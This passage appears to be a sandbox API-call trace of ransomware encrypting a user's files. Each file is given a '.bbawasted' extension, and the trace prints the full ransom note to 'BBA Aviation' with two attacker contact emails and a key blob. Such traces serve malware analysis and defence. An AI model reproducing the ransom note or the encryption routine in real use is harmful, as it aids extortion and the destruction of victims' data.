dwFlags=0x0, lpMem=0x6a17c0 | out: hHeap=0x660000) returned 1 [0223.391] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b1c30 | out: hHeap=0x660000) returned 1 [0223.391] _aulldvrm () returned 0x0 [0223.391] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6c58) returned 1 [0223.391] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0223.391] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0223.391] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\_qBrrp12.mp3") returned 38 [0223.391] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x256) returned 0x6bc8e0 [0223.392] lstrcpyW (in: lpString1=0x6bc92c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0223.392] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0223.392] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a61b8) returned 1 [0223.392] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0223.392] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0223.392] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\_qBrrp12.mp3.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\_qbrrp12.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0223.393] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0223.395] SetEndOfFile (hFile=0x28c) returned 1 [0223.395] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0223.395] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0223.395] lstrcpyW (in: lpString1=0x6bc92c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0223.395] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\_qBrrp12.mp3" (normalized: "c:\\users\\fd1hvy\\music\\_qbrrp12.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\_qBrrp12.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\_qbrrp12.mp3.bbawasted")) returned 1 [0223.396] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\_qBrrp12.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\_qbrrp12.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0223.396] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0223.397] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x166dc [0223.397] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x166dc) returned 0x5f0000 [0223.397] CloseHandle (hObject=0x280) returned 1 [0223.401] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0223.565] CloseHandle (hObject=0x288) returned 1 [0223.565] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6bdcf0 [0223.565] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6460) returned 1 [0223.566] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x1b8, pbBuffer=0x6bdd38 | out: pbBuffer=0x6bdd38) returned 1 [0223.566] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0223.566] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6bd0) returned 1 [0223.567] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0223.567] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0223.578] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0223.578] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0223.578] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0223.578] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]kbd1qYvFpkFYU+G3bqyaYucCqbz0PF3YNAqAwdxtw/yXAFwLBgJsP5CiRAVojLg6\r\nwgfEB1fOQMkioIkfDQPhJWWtx6gr6ixzf50CoHJ/LZQ7Idnf1GIoPtFx/tQzcRwV\r\nOWGEMamQAFIH2YeGGQN9C0VkDl0G9wZXtBUKueXXo6+JJxIjfofnDU04UVAMKvzc\r\no7Qk/JoHtPvw4Gg+kFY0x8bDthXQUUSDPGg52ZZAd8U+aM70F5NUUYNTLJgIjjbV\r\noiXPnkPdAtZvsTy5Q7IT2X50bJXyWLV9KV0TPvtrjl3d8KZ08Q8JURYWnVAzyieP\r\nOdEmXoG/iY4pCOqU6uIzlSdpKthpicSSj0eZcT5b/lxsPGWjbAZkG26dYuqlS3Ks\r\neFbt+vup7OuG5ufivA2BygQ8gsq0QkR7TSbbEfsam8zx8lDu4NbUSwAb59FGVGTc\r\nc15m3BCnzsjyPTEdNSxhEB035I0G23mJQDeKjX3NPi2CwI0qEvUvAX1za3/kuQ/C\r\nxA3SqEP06SglftOQAW83c7pwxYAXKv9Hu4POHmcvpXyTucuxxNET6m+IxikTKqI3\r\ndM7Qlf8YIK+OcNbPtOPxsOPhmG+a6YXL4gP/uzlZM9+lJFgZKpaj09zLW+zAoU4D\r\nZWArWWjMnQgE4brl6+W4ACEdbEWRGGeBctwzdcirujW=[end_key]\r\nKEEP IT\r\n") returned 984 [0223.579] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0223.579] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0223.579] SetEndOfFile (hFile=0x28c) returned 1 [0223.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0223.582] CloseHandle (hObject=0x28c) returned 1 [0223.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0223.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b3ae8 | out: hHeap=0x660000) returned 1 [0223.583] _aulldvrm () returned 0x0 [0223.583] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6ac0) returned 1 [0223.583] CryptGenRandom (in: hProv=0x6a6ac0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0223.583] CryptReleaseContext (hProv=0x6a6ac0, dwFlags=0x0) returned 1 [0223.583] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\ntuser.dat.LOG1") returned 35 [0223.583] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x6c4888 [0223.584] lstrcpyW (in: lpString1=0x6c48ce, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0223.584] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0223.584] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a60a8) returned 1 [0223.585] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0223.585] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0223.585] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\ntuser.dat.LOG1.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\ntuser.dat.log1.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0223.586] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0223.587] SetEndOfFile (hFile=0x28c) returned 1 [0223.588] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0223.588] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0223.588] lstrcpyW (in: lpString1=0x6c48ce, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0223.588] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\ntuser.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\ntuser.dat.log1"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\ntuser.dat.LOG1.bbawasted" (normalized: "c:\\users\\fd1hvy\\ntuser.dat.log1.bbawasted")) returned 0 [0223.588] GetLastError () returned 0x20 [0223.588] CloseHandle (hObject=0x28c) returned 1 [0223.588] lstrcpyW (in: lpString1=0x6c48ce, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0223.588] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\ntuser.dat.LOG1.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\ntuser.dat.log1.bbawasted_info")) returned 1 [0223.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4888 | out: hHeap=0x660000) returned 1 [0223.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdef8 | out: hHeap=0x660000) returned 1 [0223.590] _aulldvrm () returned 0x0 [0223.590] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6818) returned 1 [0223.591] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0223.591] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0223.591] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf") returned 75 [0223.591] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2a0) returned 0x6bdcf0 [0223.591] lstrcpyW (in: lpString1=0x6bdd86, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0223.591] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0223.591] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6bd0) returned 1 [0223.592] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0223.592] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0223.592] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tm.blf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0223.593] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0223.594] SetEndOfFile (hFile=0x28c) returned 1 [0223.594] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0223.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0223.594] lstrcpyW (in: lpString1=0x6bdd86, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0223.594] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf" (normalized: "c:\\users\\fd1hvy\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tm.blf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf.bbawasted" (normalized: "c:\\users\\fd1hvy\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tm.blf.bbawasted")) returned 0 [0223.595] GetLastError () returned 0x20 [0223.595] CloseHandle (hObject=0x28c) returned 1 [0223.595] lstrcpyW (in: lpString1=0x6bdd86, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0223.595] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tm.blf.bbawasted_info")) returned 1 [0223.598] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0223.598] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdf98 | out: hHeap=0x660000) returned 1 [0223.598] _aulldvrm () returned 0x0 [0223.598] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a64e8) returned 1 [0223.599] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0223.599] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0223.599] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms") returned 112 [0223.599] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2ea) returned 0x6bdcf0 [0223.600] lstrcpyW (in: lpString1=0x6bddd0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0223.600] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0223.600] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6bd0) returned 1 [0223.601] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0223.601] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0223.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000001.regtrans-ms.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0223.601] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0223.603] SetEndOfFile (hFile=0x28c) returned 1 [0223.603] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0223.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0223.603] lstrcpyW (in: lpString1=0x6bddd0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0223.603] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\fd1hvy\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms.bbawasted" (normalized: "c:\\users\\fd1hvy\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000001.regtrans-ms.bbawasted")) returned 0 [0223.604] GetLastError () returned 0x20 [0223.604] CloseHandle (hObject=0x28c) returned 1 [0223.604] lstrcpyW (in: lpString1=0x6bddd0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0223.604] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000001.regtrans-ms.bbawasted_info")) returned 1 [0223.605] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0223.605] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be088 | out: hHeap=0x660000) returned 1 [0223.606] _aulldvrm () returned 0x0 [0223.606] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a60a8) returned 1 [0223.606] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0223.606] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0223.606] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms") returned 112 [0223.606] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2ea) returned 0x6bc8e0 [0223.607] lstrcpyW (in: lpString1=0x6bc9c0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0223.607] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0223.607] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6bd0) returned 1 [0223.607] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0223.607] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0223.607] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000002.regtrans-ms.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0223.608] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0224.047] SetEndOfFile (hFile=0x28c) returned 1 [0224.047] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0224.048] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0224.048] lstrcpyW (in: lpString1=0x6bc9c0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0224.048] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\fd1hvy\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms.bbawasted" (normalized: "c:\\users\\fd1hvy\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000002.regtrans-ms.bbawasted")) returned 0 [0224.048] GetLastError () returned 0x20 [0224.048] CloseHandle (hObject=0x28c) returned 1 [0224.048] lstrcpyW (in: lpString1=0x6bc9c0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0224.048] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000002.regtrans-ms.bbawasted_info")) returned 1 [0224.049] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0224.049] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be1c8 | out: hHeap=0x660000) returned 1 [0224.049] _aulldvrm () returned 0x0 [0224.049] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6ce0) returned 1 [0224.050] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0224.050] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0224.050] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\6NwMC1A.jpg") returned 40 [0224.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25a) returned 0x6adb18 [0224.050] lstrcpyW (in: lpString1=0x6adb68, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0224.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0224.051] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6020) returned 1 [0224.051] CryptGenRandom (in: hProv=0x6a6020, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0224.051] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0224.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\6NwMC1A.jpg.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\6nwmc1a.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0224.052] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0224.053] SetEndOfFile (hFile=0x28c) returned 1 [0224.053] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0224.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0224.053] lstrcpyW (in: lpString1=0x6adb68, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0224.054] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\6NwMC1A.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\6nwmc1a.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\6NwMC1A.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\6nwmc1a.jpg.bbawasted")) returned 1 [0224.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\6NwMC1A.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\6nwmc1a.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0224.055] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0224.055] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xa348 [0224.055] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, 